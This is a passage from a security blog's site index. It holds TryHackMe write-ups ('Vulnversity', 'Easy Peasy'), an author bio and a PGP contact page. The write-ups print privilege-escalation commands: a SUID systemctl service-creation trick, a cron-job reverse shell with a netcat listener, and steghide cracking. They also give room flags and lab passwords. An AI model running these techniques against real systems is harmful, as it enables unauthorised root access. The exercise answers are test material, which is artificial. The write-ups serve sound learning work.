sudo access).\nNext,\ncat /etc/passwd {Checking System Users \u0026amp; Displays username accounts}We see Bill in our case, then we enter the same:\n$cd home$ cd bill$ pwd/home/bill8bd7992fbe8a6ad22a63361004cfcedbThen we see user.txt, so we perform cat user.txt and get the user flag.\nPRIVILEGE ESCALATION:Then, we perform this command:\nfind / -user root -perm -4000 -exec ls -ldb {} \\; 2\u0026gt;/dev/nullThis is used as : Searches for SUID binaries (executed with root privileges).finding SUID binaries is a core privilege escalation technique/bin/systemctl has SUID set, which is unusual, and that answers the first question.\nSystemctl is a command-line tool that allows for the management and monitoring of the systemd system and service manager*Next,\nI utilized GTFO BINS to search for “systemctl,” which directed me to a small script. After making a few adjustments we can run it line by line.\n— ( I found John Hammond’s video on this specific topic incredibly helpful. I highly recommend following him and exploring his content, as I found it very informative)\nTF=$(mktemp).serviceecho ‘[Service]Type=oneshotExecStart=/bin/sh -c “id \u0026gt; /tmp/output”[Install]WantedBy=multi-user.target’ \u0026gt; $TFCreates a temporary systemd service that runs a command as root\n./systemctl link $TF./systemctl enable — now $TFThen,\n$ cd /tmp/$ lsWhich the shows the output file present\n$ cat outputa58ff8579f0a9270368d33a9966c7fd5I hope this write-up walkthrough was helpful to you all! It was a quick room that gave us a light touch on the fundamentals.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r.\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"16 March 2025","externalUrl":null,"permalink":"/writeups/tryhackme/vulnversity-thm-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"VULNVERSITY -THM -WRITEUP","type":"writeups"},{"content":" Hello everyone! This is an easy room from the TryHackMe platform called “Easy Peasy”. The room covers basic tool usage such as nmap… EASY PEASY — THM CTF — WRITEUPHello everyone! This is an easy room from the TryHackMe platform called “Easy Peasy”. The room covers basic tool usage such as nmap, feroxbuster, and gobuster.\nWhile the room is marked as “easy,” there are a few twists in the process that might make some steps challenging. But that’s where this write-up comes in to guide you through!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nNo need to have that expression on your face, I know you’re just here for the sauce😹First, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready\nOnce it’s up, let’s paste the IP address and connect to the network. This is what we have in front of us:\nI know there’s nothing here for now, so the next step is to find the open ports. Let’s use nmap to uncover them\nFirst, I run the following command to scan specific ports on the target machine:\nnmap -sV -p- 10.10.14.65 — open\n-sV: Enables version detection to identify the versions of services running on open ports.\n-p-: Scans all 65535 ports on the target machine.\n10.10.14.65: The target IP address you are scanning.\n--open: Displays only the open ports, filtering out closed ones from the results\nWhile this command runs and gives us the output, I’m also running the following command to see if I can find anything else or uncover more details\nnmap -sCV -p90,6498,65524 10.10.14.65\n-sCV: Runs the default scripts, performs service and version detection, and conducts basic scanning.-p90,6498,65524: This specifies the ports we want to scan (90, 6498, and 65524).10.10.14.65: The target IP addressWhile copying and pasting this command, make sure to change the IP to your target’s IP — unless you want a bizarre response in the terminalBy running this command, we immediately spot the answers to the three questions:\n3 open portsnginx 1.16.1ApacheTASK 2:Next, in our terminal, we’ll use feroxbuster (you could use gobuster if you’d like, but I’m more used to running feroxbuster).\nRun the following command:\nferoxbuster -u http://10.10.14.65/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\nOnce it’s done, we get the following results, which prompt me to open them. I then copy and paste the results into two different tabs for further exploration.\nUpon initially seeing it, I thought it might be steganography. I tried downloading the images and running them through a tool, but there were no results. Then, I decided to inspect the page.\nIn hindsight, starting by inspecting the page would have been a better approach.\nHere, we don’t find anything, so we move on to inspect the next page.\nThen, we come across this, and from prior experience and by looking at it closely, I can tell it’s likely encoded in Base64.\nSo, I copy it and head over to https://www.base64decode.org/ to decode it. This leads me to the first flag.\nflag{f1rs7_fl4g}Now, to figure out the other flags, I refer to the three port numbers mentioned in the Nmap scan and navigate to port 65524, which is open with HTTP. This leads me to the Apache page\nSitting on the Apache page, my first instinct is to check the robots.txt file for any web crawlers. And sure enough, it leads me to this\nUser-Agent:a18672860d0510e5ab6699730763b250I notice this is an MD5 hash, so I use https://md5hashing.net/ to decode it and uncover the second flag.\nflag{1m_s3c0nd_fl4g}While inspecting the Apache page, I noticed something hidden in plain sight. In the page’s HTML source code, I found the third flag:\nFl4g 3 : flag{9fdafbd64c47471a8f54cd3fc64cd312}\nSummary of the 3 flagsNow, this is where things get a bit twisted. After looking around for a bit, I finally realized something when I saw this while inspecting the same page, just above the third flag, next to the word ‘hidden’\nObsJmP173N2X6dOrAgEAL0VuNow, with this clue, we need to figure out what to do next. I use https://www.dcode.fr/cipher-identifier and identify that it’s encoded in Base62.\nAfter decoding the string ObsJmP173N2X6dOrAgEAL0Vu, I get /n0th1ng3ls3m4tt3r, which looks like a directory format\nI then use the decoded directory path, which leads me to this page with an image.\nSo, I proceed to download both the image and the wordlist. Then, in the terminal, I perform the steganography decryption process by running the following command first:\n-\u0026gt; stegcracker bbi.jpg easype.txt\nSo, I proceed to download both the image (bbi.jpg) and the wordlist (easype.txt). Then, in the terminal, I perform the steganography decryption process by running the following command, which leads me to:\npassword: mypasswordforthatjobI perform the following command to extract the hidden content:\n-\u0026gt; steghide — extract -sf bbi.jpg\n--extract: This flag tells steghide to extract hidden data from the image.-sf bbi.jpg: The -sf flag specifies the input file, in this case, bbi.jpgUpon discovering the username boring, it prompts the thought of SSH/FTP to me. Since we know the data is in binary, we decode it online using this site.\nPassword: iconvertedmypasswordtobinaryAfter decoding, we get the password: iconvertedmypasswordtobinary.\nWith this, I head to the terminal and attempt to access the SSH service using the following command: ssh boring@10.10.14.65 -p 6498\nport 6498 as in the nmap it was the ssh portI enter the password and gain access to the system.Wasting no time, I immediately use the ls command to list the files present.Among the files, I find user.txt.I then use the cat command to open it and retrieve the contents, which reveals this:\nThis immediately shows that ROT decoding is needed. I head over to dCode ROT and enter the ROT-encoded flag string.\nVoila! I decode it and get the flag for user.txt\nflag{n0wits33msn0rm4l}Now that I have the user.txt flag, I turn my attention to gaining access to root.txt. To do that, I start by checking for any potential ways to elevate my privilege\nFirst, I run sudo -l, but it doesn’t yield any helpful results. So, I move on to check the crontab process for any interesting entries: cat /etc/crontab\nBut, here is the peculiar entry:\n* * * * * root cd /var/www/ \u0026amp;\u0026amp; sudo bash .mysecretcronjob.sh\nThis line indicates that there is a cron job running every minute as the root user that executes the script .mysecretcronjob.sh inside /var/www/.\nThe job is using sudo, which may give us an opportunity for privilege escalation.\nI refer to the Pentest Monkey Cheat Sheet for a reverse shell payload. I then execute the payload in the bash file, and simultaneously, I open a new terminal tab to start the listener: {nc -lvnp 4444}\nBy executing the reverse shell payload successfully, I gain access to the system. I then proceed with the following 4 commands:\nls — To list the contents.cd ~ — To navigate to the home directory.ls -la — To list all files, including hidden ones.cat .root.txt — To read the root flag and complete the objective.This leads us to the root flag: flag{63a9f0ea7bb98050796b649e85481845}, and with that, we have successfully completed the room!\nCONCLUSION :I hope this writeup walkthrough from my end was helpful to you guys. I thought it would be a quick room, but it challenged me, and in the end, it was fun to complete.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. This being my first writeup, I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r.\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"11 March 2025","externalUrl":null,"permalink":"/writeups/tryhackme/easy-peasy-thm-ctf-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"EASY PEASY — THM CTF — WRITEUP","type":"writeups"},{"content":"Hi, I\u0026rsquo;m 5kullk3r — a tech professional building a specialized foundation in security and digital risk. I combine technical curiosity with business acumen, aiming to operate at the sharp end of crisis management — stepping into major breaches or system conflicts to mitigate risk and guide an infrastructure back to operational stability.\n01 · The Journey \u0026amp; Philosophy # The Backstory I started as a complete newbie. I didn\u0026rsquo;t know what a basic Linux command like ls did, let alone how to run a proper network scan with nmap. The Philosophy Be the guide I wish I had when I first started. Most writeups copy-paste final flags without explaining the why. The Method When breaking down challenges on TryHackMe, OverTheWire, and HackTheBox, I document the complete thought process — including the mistakes and the structural rabbit holes. Showing the long route is how real learning happens. 02 · Birth of the Page # The Forced Pivot This platform exists because of a forced move into digital sovereignty. The Trigger I originally hosted my technical analyses on Medium, but the platform abruptly suspended my account, demanding the removal of my writeups. The Result Rather than letting a third-party gatekeeper dictate how I share knowledge, I built my own infrastructure. This self-hosted blog belongs entirely to the community. 03 · My Rig \u0026amp; Environment # The Daily Driver Apple Silicon MacBook running an optimized macOS environment — efficient, stable, and built on a solid Unix foundation. The Lab A dedicated target environment running a highly customized Kali Linux instance, tailored to my specific testing workflows. The Hardware Failure My previous Windows 10 machine literally blew up mid-operation under the weight of a heavy Hashcat password-cracking session and video games 😮‍💨. Off the Clock I clear mental fatigue by staying active in high-intensity physical sports and tuning into a solid rap playlist. \u0026larr; Back to Home Join the Intel Network Get technical \u0026 security writeups and other articles delivered straight to your inbox.\nSubscribe ","externalUrl":null,"permalink":"/about/","section":"Home","summary":"","title":"About Me","type":"page"},{"content":"","externalUrl":null,"permalink":"/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":"","externalUrl":null,"permalink":"/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"},{"content":" If you need to transmit sensitive findings, vulnerability data, or professional inquiries securely, use Setup B: The Cryptographic Drop Box.\nHow to send an encrypted payload: # Copy the metadata-free public PGP key block below. Encrypt your message text locally on your own machine. Paste the resulting scrambled, encrypted text output directly into the Secure Message Portal below and hit submit. Your message will route safely to the destination backend without exposing email identifiers, IP routes, or cleartext metadata to public gateway monitors.\n1. Public Drop Box Key # -----BEGIN PGP PUBLIC KEY BLOCK----- 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 FfK1zI4TWw== =x50B -----END PGP PUBLIC KEY BLOCK----- **Key Fingerprint:** `7716 7EBC 70F9 165C 1BBD D2DF BD63 7107 A527 4772` --- ### 2. Secure Message Portal Sender Alias (Optional) Encrypted PGP Payload Transmit Payload ************************************************************************************************************* Join the Intel Network Get technical \u0026 security writeups and other articles delivered straight to your inbox.\nSubscribe ","externalUrl":null,"permalink":"/contact/","section":"Home","summary":"","title":"Secure Communications","type":"page"},{"content":"","externalUrl":null,"permalink":"/series/","section":"Series","summary":"","title":"Series","type":"series"},{"content":"","externalUrl":null,"permalink":"/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"}]